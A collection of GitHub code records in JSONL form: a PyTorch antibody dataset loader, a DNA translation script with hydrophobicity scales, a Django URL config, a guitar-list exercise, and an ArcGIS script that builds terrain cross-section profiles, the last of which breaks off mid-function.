cls.get_phi_bins(num_bins)\n\n binned_matrix = torch.zeros(dist_angle_mat.shape, dtype=torch.long)\n for i, (lower_bound, upper_bound) in enumerate(dist_bins):\n bin_mask = (dist_angle_mat[0] >= lower_bound).__and__(\n dist_angle_mat[0] < upper_bound\n )\n binned_matrix[0][bin_mask] = i\n for i, (lower_bound, upper_bound) in enumerate(omega_bins):\n bin_mask = (dist_angle_mat[1] >= lower_bound).__and__(\n dist_angle_mat[1] < upper_bound\n )\n binned_matrix[1][bin_mask] = i\n for i, (lower_bound, upper_bound) in enumerate(theta_bins):\n bin_mask = (dist_angle_mat[2] >= lower_bound).__and__(\n dist_angle_mat[2] < upper_bound\n )\n binned_matrix[2][bin_mask] = i\n for i, (lower_bound, upper_bound) in enumerate(phi_bins):\n bin_mask = (dist_angle_mat[3] >= lower_bound).__and__(\n dist_angle_mat[3] < upper_bound\n )\n binned_matrix[3][bin_mask] = i\n\n return binned_matrix\n\n def __getitem__(self, index):\n for i in range(5):\n pdb = self._pdb_file_list[(index + i) % len(self._pdb_file_list)]\n fasta = self._fasta_dir.joinpath(pdb.stem + \".fasta\")\n if not fasta.exists():\n self.convert_pdb_to_fasta(pdb=pdb, fasta=fasta)\n\n seq_list = self.get_sequences(fasta=fasta)\n if len(seq_list) != 2:\n LOG.warning(\"skip %s, it has %d chains\", fasta, len(seq_list))\n continue\n\n seq_num_list = []\n for seq in seq_list.values():\n seq_num = []\n for amino in seq:\n seq_num.append(AMINO_TO_NUM[amino])\n seq_num_list.append(torch.Tensor(seq_num).type(torch.uint8))\n\n dist_angle = self.get_label_from_pdb(pdb=pdb)\n bin_mat = self.bin_dist_angle_matrix(dist_angle)\n\n h3 = self.get_h3_cdr_indices(pdb=pdb)\n\n return (\n pdb.stem,\n F.one_hot(seq_num_list[0].long()),\n F.one_hot(seq_num_list[1].long()),\n bin_mat,\n h3,\n )\n\n def __len__(self) -> int:\n return len(self._pdb_file_list)\n\n @staticmethod\n def merge_samples_to_minibatch(samples):\n samples.sort(key=lambda x: len(x[2]), reverse=True)\n return H3AntibodyBatch(zip(*samples)).data()\n\n\nclass H3AntibodyBatch:\n def __init__(self, batch_data):\n (\n self.id_,\n self.heavy_prim,\n self.light_prim,\n self.dist_angle_mat,\n self.h3,\n ) = batch_data\n\n @staticmethod\n def pad_data_to_same_shape(tensor_list, pad_value=0):\n shapes = torch.Tensor([_.shape for _ in tensor_list])\n target_shape = torch.max(shapes.transpose(0, 1), dim=1)[0].int()\n\n padded_dataset_shape = [len(tensor_list)] + list(target_shape)\n padded_dataset = torch.Tensor(*padded_dataset_shape)\n for i, data in enumerate(tensor_list):\n padding = reversed(\n target_shape - torch.Tensor(list(data.shape)).int()\n )\n\n padding = F.pad(padding.unsqueeze(0).t(), (1, 0, 0, 0)).view(-1, 1)\n padding = padding.view(1, -1)[0].tolist()\n\n padded_data = F.pad(data, padding, value=pad_value)\n padded_dataset[i] = padded_data\n\n return padded_dataset\n\n def data(self):\n return self.features(), self.labels()\n\n def features(self):\n \"\"\"Gets the one-hot encoding of the sequences with a feature that\n delimits the chains\"\"\"\n X = [torch.cat(_, 0) for _ in zip(self.heavy_prim, self.light_prim)]\n X = self.pad_data_to_same_shape(X, pad_value=0)\n\n X = F.pad(X, (0, 1, 0, 0, 0, 0))\n for i, h_prim in enumerate(self.heavy_prim):\n X[i, len(h_prim) - 1, X.shape[2] - 1] = 1\n\n return X.transpose(1, 2).contiguous()\n\n def labels(self):\n \"\"\"Gets the distance matrix data of the batch with -1 padding\"\"\"\n label_mat = (\n self.pad_data_to_same_shape(self.dist_angle_mat, pad_value=-1)\n .transpose(0, 1)\n .long()\n )\n\n return label_mat\n\n def batch_mask(self):\n \"\"\"Gets the mask data of the batch with zero padding\"\"\"\n \"\"\"Code to use when masks are added\n masks = self.mask\n masks = pad_data_to_same_shape(masks, pad_value=0)\n return masks\n \"\"\"\n raise NotImplementedError(\"Masks have not been added to antibodies yet\")\n","repo_name":"hhk7734/h3","sub_path":"h3/dataset/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":14200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"36875313929","text":"__author__ = 'anb2126'\n# Translation of genetic code to protein\n# Step 1) Split up sequence in to codons\n# Step 2) Translate each codon to amino acid\n# Step 3) Assemble chain of amino acids\n# Step 4) Convert polypeptide to list of janin hydrophobicity values (integers)\n# Step 5) Plot janin integers on plot of aa position (x) vs janin value\n# Step 6) Find electrodensity size scale (Pymol?)\n# Step 7) Repeat steps 4-6 with size scale\n# Step 8) Find method to overlay/compare other picorna Vp1s using the above\n\n# Code for method which does not print non-codons at end\n\ngencode = {\n 'ATA':'I', 'ATC':'I', 'ATT':'I', 'ATG':'M',\n 'ACA':'T', 'ACC':'T', 'ACG':'T', 'ACT':'T',\n 'AAC':'N', 'AAT':'N', 'AAA':'K', 'AAG':'K',\n 'AGC':'S', 'AGT':'S', 'AGA':'R', 'AGG':'R',\n 'CTA':'L', 'CTC':'L', 'CTG':'L', 'CTT':'L',\n 'CCA':'P', 'CCC':'P', 'CCG':'P', 'CCT':'P',\n 'CAC':'H', 'CAT':'H', 'CAA':'Q', 'CAG':'Q',\n 'CGA':'R', 'CGC':'R', 'CGG':'R', 'CGT':'R',\n 'GTA':'V', 'GTC':'V', 'GTG':'V', 'GTT':'V',\n 'GCA':'A', 'GCC':'A', 'GCG':'A', 'GCT':'A',\n 'GAC':'D', 'GAT':'D', 'GAA':'E', 'GAG':'E',\n 'GGA':'G', 'GGC':'G', 'GGG':'G', 'GGT':'G',\n 'TCA':'S', 'TCC':'S', 'TCG':'S', 'TCT':'S',\n 'TTC':'F', 'TTT':'F', 'TTA':'L', 'TTG':'L',\n 'TAC':'Y', 'TAT':'Y', 'TAA':'_', 'TAG':'_',\n 'TGC':'C', 'TGT':'C', 'TGA':'_', 'TGG':'W'}\n\njanin_code = {\n 'I': 0.7, 'F': 0.5, 'V': 0.6, 'L': 0.5, 'W': 0.3, 'M': 0.4,\n 'A': 0.3, 'G': 0.3, 'C': 0.9, 'Y': -0.4, 'P': -0.3, 'T': -0.2,\n 'S': -0.1, 'H': -0.1, 'E': -0.7, 'N': -0.5, 'Q': -0.7, 'D': -0.6, 'K': -1.8, 'R': -1.4}\n\nkd_code = {\n 'I': 4.5, 'F': 2.8, 'V': 4.2, 'L': 3.8, 'W': -0.9, 'M': 1.9, 'A': 1.8, 'G': -0.4, 'C': 2.5,\n 'Y': -1.3, 'P': -1.6, 'T': -0.7, 'S': -0.8, 'H': -3.2, 'E': -3.5, 'N': -3.5, 'Q': -3.5,\n 'D': -3.5, 'K': -3.9, 'R': -4.5}\n\new_code = {\n 'I' : 0.73, \"F\" : 0.61, 'V': 0.54, 'L': 0.53, 'W': 0.37, 'M': 0.26, 'A': 0.25,\n 'G': 0.16, 'C': 0.04, 'Y': 0.02, 'P': -0.07, 'T': -0.18, 'S': -0.26, 'H': -0.40,\n 'E': -0.62, 'N': -0.64, 'Q': -0.69, 'D': -0.72, 'K': -1.10, 'R': -1.8}\n\n\n\ndef translate_dna(dna):\n last=len(dna)-2\n print(last)\n polypep=\"\"\n for base in range(0,last,3):\n codon=dna[base:base+3]\n print(\"Codon:\",codon)\n amino=gencode.get(codon.upper(), 'X')\n print(amino)\n polypep+=amino\n print(polypep)\n return(polypep)\n\ndef janin_scale(polypep):\n janin_points = []\n for aa in polypep:\n janin = janin_code.get(aa)\n print(janin)\n janin_points.append(janin)\n print(\"\\n Janin_points:\", janin_points )\n return [janin_points]\n\ndef kd_scale(polypep):\n kd_points = []\n for aa in polypep:\n kd = kd_code.get(aa)\n print(kd)\n kd_points.append(kd)\n print(\"\\n Kyte and Doolittle points:\", kd_points)\n return [kd_points]\n\ndef ew_scale(polypep):\n ew_points = []\n for aa in polypep:\n ew = ew_code.get(aa)\n print(ew)\n ew_points.append(ew)\n print(\"\\n Eisenberg Weis points:\", ew_points)\n return [ew_points]\n\ndna=input(\"Paste Sequence for Translation Here:\")\n\ndna=dna.upper()\n\ntranslate_dna(dna)\n\npp = translate_dna(dna)\n\njanin_scale(pp)\n\nkd_scale(pp)\n\new_scale(pp)\n","repo_name":"ashbnyc/polypeptides-","sub_path":"translation.py","file_name":"translation.py","file_ext":"py","file_size_in_byte":3212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"72268761647","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\n\nfrom users.views import (\n CustomerModelViewSet,\n StoreModelViewSet,\n)\n\nrouter = DefaultRouter()\nrouter.register(\"Customer\", CustomerModelViewSet, basename=\"customer\")\nrouter.register(\"Store\", StoreModelViewSet, basename=\"store\")\n\nurlpatterns = (\n [\n path('admin/', admin.site.urls),\n path('api/', include(\"api.urls\")),\n path('auth/', include(\"djoser.urls\")),\n path('auth/', include(\"djoser.urls.jwt\")), \n ]\n + router.urls\n)\n","repo_name":"AsjadIftikhar/Panda-Mall","sub_path":"project/backend/backend/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"}
+{"seq_id":"40757616077","text":"\"\"\"Guitar program\"\"\"\nfrom guitar import Guitar\n\nguitars = []\n\n\ndef main():\n \"\"\"Guitar program is worked by Guitar class\"\"\"\n\n print(\"My guitars!\")\n name = input(\"Name: \")\n while name != \"\":\n year = int(input(\"year: \"))\n cost = float(input(\"Cost: $\"))\n add_information = Guitar(name, year, cost)\n guitars.append(add_information)\n print(add_information, \"added.\")\n name = input(\"Name: \")\n\n guitars.append(Guitar(\"Gibson L-5 CES\", 1922, 16035.40))\n guitars.append(Guitar(\"Line 6 JTV-59\", 2010, 1512.9))\n\n if guitars:\n guitars.sort() # sorting by year through the __lt__ method in Guitar class\n print(\"These are my guitars:\")\n for thing, things in enumerate(guitars): # display number of guitar\n vintage_string = \"\"\n if things.is_vintage():\n vintage_string = \"(vintage)\"\n print(\"Guitar {}: {:>20} ({}), worth ${:10,.2f}{}\".format(thing, things.name,\n things.year, things.cost,\n vintage_string))\n else:\n print(\"No guitars\")\n\n\nmain()\n","repo_name":"TheRealJayLuong/cp1404","sub_path":"prac_06/guitars.py","file_name":"guitars.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"33602076284","text":"import arcpy\nimport numpy as np\nimport pandas as pd\nimport math\n# from base import *\narcpy.env.overwriteOutput = True\n\n# params\ngrid_size = 5 #m\ninput_gdb = r\"C:\\Users\\vince\\Documents\\ArcGIS\\Projects\\rasters willem oktober\\input_rasters.gdb\"#database\noutput_gdb = r\"C:\\Users\\vince\\Documents\\ArcGIS\\Projects\\rasters willem oktober\\output_rasters.gdb\"#database\ntrajectory = r\"C:\\Users\\vince\\Documents\\ArcGIS\\Projects\\rasters willem oktober\\input_rasters.gdb\\trajectlijn_demo\"\ncode = \"code\"\nfieldnames =['profielnummer', 'afstand', 'z_ahn', 'x', 'y']\nxls_outputloc = r\"C:\\Users\\vince\\Desktop\\ssh_output\"\nraster_prefix = \"inputraster\"\n\nprofile_length_river = 30 #m\nprofile_length_land = 30 #m\nprofile_interval = 20 #m\npoint_interval = 5 #m\n\n\ndef CopyParallelL(plyP,sLength): #functie voor profielen maken haaks op trajectlijn\n part=plyP.getPart(0)\n lArray=arcpy.Array()\n for ptX in part:\n dL=plyP.measureOnLine(ptX)\n ptX0=plyP.positionAlongLine (dL-0.01).firstPoint\n ptX1=plyP.positionAlongLine (dL+0.01).firstPoint\n dX=float(ptX1.X)-float(ptX0.X)\n dY=float(ptX1.Y)-float(ptX0.Y)\n lenV=math.hypot(dX,dY)\n sX=-dY*sLength/lenV;sY=dX*sLength/lenV\n leftP=arcpy.Point(ptX.X+sX,ptX.Y+sY)\n lArray.add(leftP)\n array = arcpy.Array([lArray])\n section=arcpy.Polyline(array)\n return section\n\ndef CopyParallelR(plyP,sLength): #functie voor profielen maken haaks op trajectlijn\n part=plyP.getPart(0)\n rArray=arcpy.Array()\n for ptX in part:\n dL=plyP.measureOnLine(ptX)\n ptX0=plyP.positionAlongLine (dL-0.01).firstPoint\n ptX1=plyP.positionAlongLine (dL+0.01).firstPoint\n dX=float(ptX1.X)-float(ptX0.X)\n dY=float(ptX1.Y)-float(ptX0.Y)\n lenV=math.hypot(dX,dY)\n sX=-dY*sLength/lenV;sY=dX*sLength/lenV\n rightP=arcpy.Point(ptX.X-sX, ptX.Y-sY)\n rArray.add(rightP)\n array = arcpy.Array([rArray])\n section=arcpy.Polyline(array)\n return section\n\ndef excelWriterTraject(uitvoerpunten,excel, veldnamen):\n # df van profielpunten\n array = arcpy.da.FeatureClassToNumPyArray(uitvoerpunten, veldnamen)\n df = pd.DataFrame(array)\n\n #export excel\n df.to_excel(excel) \n\n print (\"Excel gemaakt van profieldata\")\n\n\ndef copy_trajectory_lr(trajectlijn,code,afstand):\n existing_fields = arcpy.ListFields(trajectlijn)\n needed_fields = ['OBJECTID','OBJECTID_1','Shape','Shape_Length','SHAPE', 'SHAPE_Length',code]\n for field in existing_fields:\n if field.name not in needed_fields:\n arcpy.DeleteField_management(trajectlijn, field.name)\n\n arcpy.AddField_management(trajectlijn, \"Width\", \"DOUBLE\", 2, field_is_nullable=\"NULLABLE\")\n arcpy.CalculateField_management(trajectlijn, \"Width\", afstand, \"PYTHON\")\n\n arcpy.management.CopyFeatures(trajectlijn, \"river\")\n arcpy.management.CopyFeatures(trajectlijn, \"land\")\n land = \"land\"\n river = \"river\"\n\n\n with arcpy.da.UpdateCursor(land, (\"Shape@\", \"Width\")) as cursor:\n for shp, w in cursor:\n LeftLine = CopyParallelL(shp, w)\n cursor.updateRow((LeftLine, w))\n\n with arcpy.da.UpdateCursor(river, (\"Shape@\", \"Width\")) as cursor:\n for shp, w in cursor:\n RightLine = CopyParallelR(shp, w)\n cursor.updateRow((RightLine, w))\n\n print ('Trajectlijnen-offset gemaakt')\n\n\ndef generate_profiles(profiel_interval,profiel_lengte_land,profiel_lengte_rivier,trajectlijn,code,profielen):\n # traject to points\n arcpy.GeneratePointsAlongLines_management(trajectlijn, 'traject_punten', 'DISTANCE', Distance=profiel_interval, Include_End_Points='NO_END_POINTS')\n arcpy.AddField_management('traject_punten', \"profielnummer\", \"DOUBLE\", 2, field_is_nullable=\"NULLABLE\")\n arcpy.AddField_management('traject_punten', \"lengte_landzijde\", \"DOUBLE\", 2, field_is_nullable=\"NULLABLE\")\n arcpy.AddField_management('traject_punten', \"lengte_rivierzijde\", \"DOUBLE\", 2, field_is_nullable=\"NULLABLE\")\n arcpy.CalculateField_management('traject_punten', \"profielnummer\", '!OBJECTID!', \"PYTHON\")\n arcpy.CalculateField_management('traject_punten', \"lengte_landzijde\", profiel_lengte_land, \"PYTHON\")\n arcpy.CalculateField_management('traject_punten', \"lengte_rivierzijde\", profiel_lengte_rivier, \"PYTHON\")\n\n # route voor trajectlijn\n # arcpy.CreateRoutes_lr(trajectlijn, code, \"route_traject\", \"LENGTH\", \"\", \"\", \"UPPER_LEFT\", \"1\", \"0\", \"IGNORE\", \"INDEX\")\n\n existing_fields = arcpy.ListFields(trajectlijn)\n needed_fields = ['OBJECTID','OBJECTID_1', 'SHAPE', 'SHAPE_Length','Shape','Shape_Length',code]\n for field in existing_fields:\n if field.name not in needed_fields:\n arcpy.DeleteField_management(trajectlijn, field.name)\n arcpy.AddField_management(trajectlijn, \"van\", \"DOUBLE\", 2, field_is_nullable=\"NULLABLE\")\n arcpy.AddField_management(trajectlijn, \"tot\", \"DOUBLE\", 2, field_is_nullable=\"NULLABLE\")\n arcpy.CalculateField_management(trajectlijn, \"van\", 0, \"PYTHON\")\n # arcpy.CalculateField_management(trajectlijn, \"tot\", \"!Shape_Length!\", \"PYTHON\")\n arcpy.CalculateField_management(trajectlijn, \"tot\", \"round(!shape.length!)\", \"PYTHON\")\n arcpy.CreateRoutes_lr(trajectlijn, code, 'route_traject', \"TWO_FIELDS\", \"van\", \"tot\", \"\", \"1\",\n \"0\", \"IGNORE\", \"INDEX\")\n\n\n # locate profielpunten\n arcpy.LocateFeaturesAlongRoutes_lr('traject_punten', 'route_traject', code, \"1.5 Meters\", 'tabel_traject_punten',\n \"RID POINT MEAS\", \"FIRST\", \"DISTANCE\", \"ZERO\", \"FIELDS\",\n \"M_DIRECTON\")\n\n # offset rivierdeel profiel\n arcpy.MakeRouteEventLayer_lr('route_traject', code, 'tabel_traject_punten', \"rid POINT meas\", 'deel_rivier',\n \"lengte_rivierzijde\", \"NO_ERROR_FIELD\", \"NO_ANGLE_FIELD\", \"NORMAL\", \"ANGLE\", \"RIGHT\",\n \"POINT\")\n\n arcpy.MakeRouteEventLayer_lr('route_traject', code, 'tabel_traject_punten', \"rid POINT meas\", 'deel_land',\n \"lengte_landzijde\", \"NO_ERROR_FIELD\", \"NO_ANGLE_FIELD\", \"NORMAL\", \"ANGLE\", \"LEFT\",\n \"POINT\")\n # temp inzicht layer\n arcpy.management.CopyFeatures('deel_rivier', \"temp_rivierdeel\")\n arcpy.management.CopyFeatures('deel_land', \"temp_landdeel\")\n arcpy.AddField_management('temp_rivierdeel', \"id\", \"DOUBLE\", 2, field_is_nullable=\"NULLABLE\")\n arcpy.AddField_management('temp_landdeel', \"id\", \"DOUBLE\", 2, field_is_nullable=\"NULLABLE\")\n arcpy.CalculateField_management('temp_rivierdeel', \"id\", 2, \"PYTHON\")\n arcpy.CalculateField_management('temp_landdeel', \"id\", 1, \"PYTHON\")\n\n arcpy.Merge_management(\"'temp_rivierdeel';'temp_landdeel'\", 'merge_profielpunten')\n arcpy.PointsToLine_management('merge_profielpunten', profielen, \"profielnummer\", \"id\", \"NO_CLOSE\")\n\n arcpy.SpatialJoin_analysis(profielen, trajectlijn, 'profielen_temp', \"JOIN_ONE_TO_ONE\", \"KEEP_ALL\", match_option=\"INTERSECT\")\n arcpy.management.CopyFeatures('profielen_temp', profielen)\n # arcpy.FlipLine_edit(profielen)\n\n print ('Profielen gemaakt op trajectlijn')\n\ndef set_measurements_trajectory(profielen,trajectlijn,code,stapgrootte_punten): #rechts = rivier, profielen van binnen naar buiten\n # clean feature\n existing_fields = arcpy.ListFields(profielen)\n needed_fields = ['OBJECTID', 'SHAPE', 'SHAPE_Length','Shape','Shape_Length','profielnummer']\n for field in existing_fields:\n if field.name not in needed_fields:\n arcpy.DeleteField_management(profielen, field.name)\n\n # add needed fields\n #arcpy.AddField_management(profielen, \"profielnummer\", \"DOUBLE\", 2, field_is_nullable=\"NULLABLE\")\n arcpy.AddField_management(profielen, \"van\", \"DOUBLE\", 2, field_is_nullable=\"NULLABLE\")\n arcpy.AddField_management(profielen, \"tot\", \"DOUBLE\", 2, field_is_nullable=\"NULLABLE\")\n\n #arcpy.CalculateField_management(profielen, \"profielnummer\", '!OBJECTID!', \"PYTHON\")\n\n # split profiles\n rivierlijn = \"river\"\n landlijn = \"land\"\n clusterTolerance = 0\n invoer = [profielen, trajectlijn]\n uitvoer = 'snijpunten_centerline'\n arcpy.Intersect_analysis(invoer, uitvoer, \"\", clusterTolerance, \"point\")\n arcpy.SplitLineAtPoint_management(profielen, uitvoer, 'profielsplits', 1)\n\n velden = ['profielnummer', 'van', 'tot',code]\n\n fieldmappings = arcpy.FieldMappings()\n fieldmappings.addTable('profielsplits')\n fieldmappings.addTable(rivierlijn)\n fieldmappings.addTable(landlijn)\n keepers = velden\n\n # join splits to river/land parts\n for field in fieldmappings.fields:\n if field.name not in keepers:\n fieldmappings.removeFieldMap(fieldmappings.findFieldMapIndex(field.name))\n\n arcpy.SpatialJoin_analysis('profielsplits', rivierlijn, 'profieldeel_rivier', \"JOIN_ONE_TO_ONE\", \"KEEP_COMMON\", fieldmappings,\n match_option=\"INTERSECT\")\n arcpy.SpatialJoin_analysis('profielsplits', landlijn, 'profieldeel_land', \"JOIN_ONE_TO_ONE\", \"KEEP_COMMON\",\n fieldmappings,\n match_option=\"INTERSECT\")\n\n # create routes\n arcpy.CalculateField_management(\"profieldeel_rivier\", \"tot\", '!Shape_Length!', \"PYTHON\")\n arcpy.CalculateField_management(\"profieldeel_land\", \"tot\", '!Shape_Length!', \"PYTHON\")\n arcpy.CalculateField_management(\"profieldeel_rivier\", \"van\", 0, \"PYTHON\")\n arcpy.CalculateField_management(\"profieldeel_land\", \"van\", 0, \"PYTHON\")\n\n\n arcpy.CreateRoutes_lr('profieldeel_rivier', \"profielnummer\", \"routes_rivier_\", \"TWO_FIELDS\", \"van\", \"tot\", \"\", \"1\", \"0\",\n \"IGNORE\", \"INDEX\")\n\n arcpy.CreateRoutes_lr('profieldeel_land', \"profielnummer\", \"routes_land_\", \"TWO_FIELDS\", \"tot\", \"van\", \"\", \"1\",\n \"0\", \"IGNORE\", \"INDEX\")\n\n #join code\n velden = ['profielnummer',code]\n fieldmappings = arcpy.FieldMappings()\n fieldmappings.addTable('routes_land_')\n fieldmappings.addTable('routes_rivier_')\n fieldmappings.addTable(trajectlijn)\n\n keepers = velden\n for field in fieldmappings.fields:\n if field.name not in keepers:\n fieldmappings.removeFieldMap(fieldmappings.findFieldMapIndex(field.name))\n\n arcpy.SpatialJoin_analysis('routes_rivier_', trajectlijn, 'routes_rivier', \"JOIN_ONE_TO_ONE\", \"KEEP_COMMON\",\n fieldmappings,\n match_option=\"INTERSECT\")\n arcpy.SpatialJoin_analysis('routes_land_', trajectlijn, 'routes_land', \"JOIN_ONE_TO_ONE\", \"KEEP_COMMON\",\n fieldmappings,\n match_option=\"INTERSECT\")\n\n # generate points\n arcpy.GeneratePointsAlongLines_management('routes_land', 'punten_land', 'DISTANCE', Distance= stapgrootte_punten)\n arcpy.GeneratePointsAlongLines_management('routes_rivier', 'punten_rivier', 'DISTANCE', Distance=stapgrootte_punten)\n\n\n # id field for joining table\n arcpy.AddField_management('punten_land', 'punt_id', \"DOUBLE\", field_precision=2, field_is_nullable=\"NULLABLE\")\n arcpy.AddField_management('punten_rivier', 'punt_id', \"DOUBLE\", field_precision=2, field_is_nullable=\"NULLABLE\")\n arcpy.CalculateField_management(\"punten_land\", \"punt_id\", '!OBJECTID!', \"PYTHON\")\n arcpy.CalculateField_management(\"punten_rivier\", \"punt_id\", '!OBJECTID!', \"PYTHON\")\n\n\n # find points along routes\n Output_Event_Table_Properties = \"RID POINT MEAS\"\n arcpy.LocateFeaturesAlongRoutes_lr('punten_land', 'routes_land', \"profielnummer\", \"1 Meters\",\n 'uitvoer_tabel_land', Output_Event_Table_Properties, \"FIRST\", \"DISTANCE\", \"ZERO\",\n \"FIELDS\", \"M_DIRECTON\")\n arcpy.LocateFeaturesAlongRoutes_lr('punten_rivier', 'routes_rivier', \"profielnummer\", \"1 Meters\",\n 'uitvoer_tabel_rivier', Output_Event_Table_Properties, \"FIRST\", \"DISTANCE\", \"ZERO\",\n \"FIELDS\", \"M_DIRECTON\")\n\n # join fields from table\n arcpy.JoinField_management('punten_land', 'punt_id', 'uitvoer_tabel_land', 'punt_id', 'MEAS')\n arcpy.JoinField_management('punten_rivier', 'punt_id', 'uitvoer_tabel_rivier', 'punt_id', 'MEAS')\n arcpy.AlterField_management('punten_land', 'MEAS', 'afstand',clear_field_alias=\"CLEAR_ALIAS\")\n arcpy.AlterField_management('punten_rivier', 'MEAS', 'afstand',clear_field_alias=\"CLEAR_ALIAS\")\n\n with arcpy.da.UpdateCursor('punten_rivier', ['profielnummer', 'afstand']) as cursor:\n for row in cursor:\n row[1] = row[1]*-1\n cursor.updateRow(row)\n\n # fieldmappings = arcpy.FieldMappings()\n # fieldmappings.addTable('punten_land')\n # fieldmappings.addTable('punten_rivier')\n # fieldmappings.addTable('snijpunten_centerline')\n\n # velden = ['profielnummer', 'afstand', code]\n # keepers = velden\n\n # for field in fieldmappings.fields:\n # if field.name not in keepers:\n # fieldmappings.removeFieldMap(fieldmappings.findFieldMapIndex(field.name))\n\n arcpy.FeatureToPoint_management(\"snijpunten_centerline\", \"punten_centerline\")\n arcpy.management.Merge(['punten_land', 'punten_rivier','punten_centerline'], 'punten_profielen')\n\n arcpy.management.CalculateField(\"punten_profielen\", \"afstand\", 'round(!afstand!, 1)', \"PYTHON3\")\n\n # set centerline values to 0\n with arcpy.da.UpdateCursor('punten_profielen', ['afstand']) as cursor:\n for row in cursor:\n if row[0] == None:\n row[0] = 0\n cursor.updateRow(row)\n\n print ('Meetpunten op routes gelokaliseerd')\n\ndef extract_z_arcpy(invoerpunten, uitvoerpunten, raster): #\n\n # Test de ArcGIS Spatial Analyst extension license\n arcpy.CheckOutExtension(\"Spatial\")\n\n # Koppel z-waardes\n arcpy.sa.ExtractValuesToPoints(invoerpunten, raster, uitvoerpunten, \"NONE\", \"VALUE_ONLY\")\n\n # Pas het veld 'RASTERVALU' aan naar 'z_ahn'\n arcpy.AlterField_management(uitvoerpunten, 'RASTERVALU', 'z_ahn')\n print ('Hoogtewaarde aan punten gekoppeld')\n\ndef add_xy(uitvoerpunten,code,trajectlijn):\n\n existing_fields = arcpy.ListFields(uitvoerpunten)\n needed_fields = ['OBJECTID', 'Shape', 'profielnummer', 'afstand', 'z_ahn', code]\n for field in existing_fields:\n if field.name not in needed_fields:\n arcpy.DeleteField_management(trajectlijn, field.name)\n\n arcpy.env.outputCoordinateSystem = arcpy.Describe(uitvoerpunten).spatialReference\n # Set local variables\n in_features = uitvoerpunten\n properties = \"POINT_X_Y_Z_M\"\n length_unit = \"\"\n area_unit = \"\"\n coordinate_system = \"\"\n\n # Generate the extent coordinates using Add Geometry Properties tool\n arcpy.AddGeometryAttributes_management(in_features, properties, length_unit,\n area_unit,\n coordinate_system)\n\n arcpy.AlterField_management(uitvoerpunten, 'POINT_X', 'x')\n arcpy.AlterField_management(uitvoerpunten, 'POINT_Y', 'y')\n\n print ('XY-coordinaten aan punten gekoppeld')\n\n\ndef rewrite_rasters():\n\n arcpy.env.workspace = input_gdb\n arcpy.env.overwriteOutput = True\n\n # set environment to input\n input_rasters = arcpy.ListRasters(\"*\")\n for raster in input_rasters:\n raster = str(raster)\n if raster.startswith(raster_prefix) == True:\n raster_output = raster+\"_{}\".format(str(grid_size)+\"m\")\n # raster naar punten vertalen\n arcpy.conversion.RasterToPoint(raster, \"tempraster_points\", \"Value\")\n # # punten interpoleren met IDW en gewenste gridgrootte\n arcpy.ddd.Idw(\"tempraster_points\", \"grid_code\", output_gdb+\"/\"+raster_output, grid_size, 2, \"VARIABLE 12\", None)\n\n print (\"raster written to grid size: {}\".format(grid_size))\n\ndef profiles_part1():\n # switch environment to ouput\n arcpy.env.workspace = output_gdb\n arcpy.env.overwriteOutput = True\n output_rasters = arcpy.ListRasters(\"*\")\n for raster in output_rasters:\n raster = str(raster)\n if raster.startswith(raster_prefix) == True:\n profiles = \"profiles_{}\".format(str(raster))\n input_points = \"punten_profielen\"\n output_points = \"points_profiles_z\"\n excel = xls_outputloc+\"/\"+ \"output_profiles_{}\".format(str(raster)+\".xlsx\")\n # profielen trekken\n generate_profiles(profile_interval, profile_length_land, profile_length_river, trajectory, code, profiles)\n\n copy_trajectory_lr(trajectory,code,10)\n\n set_measurements_trajectory(profiles, trajectory, code, point_interval)\n\n extract_z_arcpy(input_points,output_points,raster)\n\n add_xy(output_points, code,trajectory)\n\n excelWriterTraject(output_points, excel, fieldnames)\n\n arcpy.AddField_management(profiles, \"midpoint_x\", \"DOUBLE\", 2, field_is_nullable=\"NULLABLE\")\n arcpy.AddField_management(profiles, \"midpoint_y\", \"DOUBLE\", 2, field_is_nullable=\"NULLABLE\")\n arcpy.AddField_management(profiles, \"bearing_1\", \"DOUBLE\", 2, field_is_nullable=\"NULLABLE\")\n arcpy.AddField_management(profiles, \"bearing_2\", \"DOUBLE\", 2, field_is_nullable=\"NULLABLE\")\n arcpy.AddField_management(profiles, \"half_length\", \"DOUBLE\", 2, field_is_nullable=\"NULLABLE\")\n\n\n\ndef find_steepest_profile():\n arcpy.env.workspace = output_gdb\n arcpy.env.overwriteOutput = True\n output_rasters = arcpy.ListRasters(\"*\")\n for raster in output_rasters:\n raster = str(raster)\n if raster.startswith(raster_prefix) == True:\n arcpy.management.CopyFeatures(\"profiles_{}\".format(str(raster)), \"profiles_test\")\n profiles = \"profiles_test\"\n \n # calculate bearing \n arcpy.management.CalculateGeometryAttributes(profiles, [[\"bearing_1\", \"LINE_BEARING\"],[\"midpoint_x\", \"CENTROID_X\"],[\"midpoint_y\", \"CENTROID_Y\"]])\n arcpy.management.CalculateField(profiles, \"bearing_2\", \"$feature.bearing_1-180\", \"ARCADE\")\n arcpy.management.CalculateField(profiles, \"half_length\", \"round(!SHAPE.LENGTH!/2)\",\"PYTHON3\") \n # iterate over profiles:\n profile_cursor = arcpy.da.SearchCursor(profiles,['bearing_1','bearing_2','midpoint_x','midpoint_y','half_length','SHAPE@','profielnummer'])\n for row in profile_cursor:\n\n attempts = list(range(0,11))\n bearing = row[0]-90\n profile_number = row[6]\n profile = \"testprofile\"\n where = '\"profielnummer\" = {}'.format(profile_number)\n arcpy.Select_analysis(profiles, profile, where)\n\n profile_list = []\n for item in attempts:\n arcpy.management.CalculateField(profile, \"bearing_1\", \"'\"+ str(round(bearing)) +\"'\", \"PYTHON3\")\n arcpy.management.CalculateField(profile, \"bearing_2\", \"'\"+ str(round(bearing-180)) +\"'\", \"PYTHON3\")\n \n arcpy.BearingDistanceToLine_management(profile, \"tester_1_{}\".format(str(item)), \"midpoint_x\", \"midpoint_y\", distance_field=\"half_length\",bearing_field=\"bearing_1\")\n arcpy.BearingDistanceToLine_management(profile, 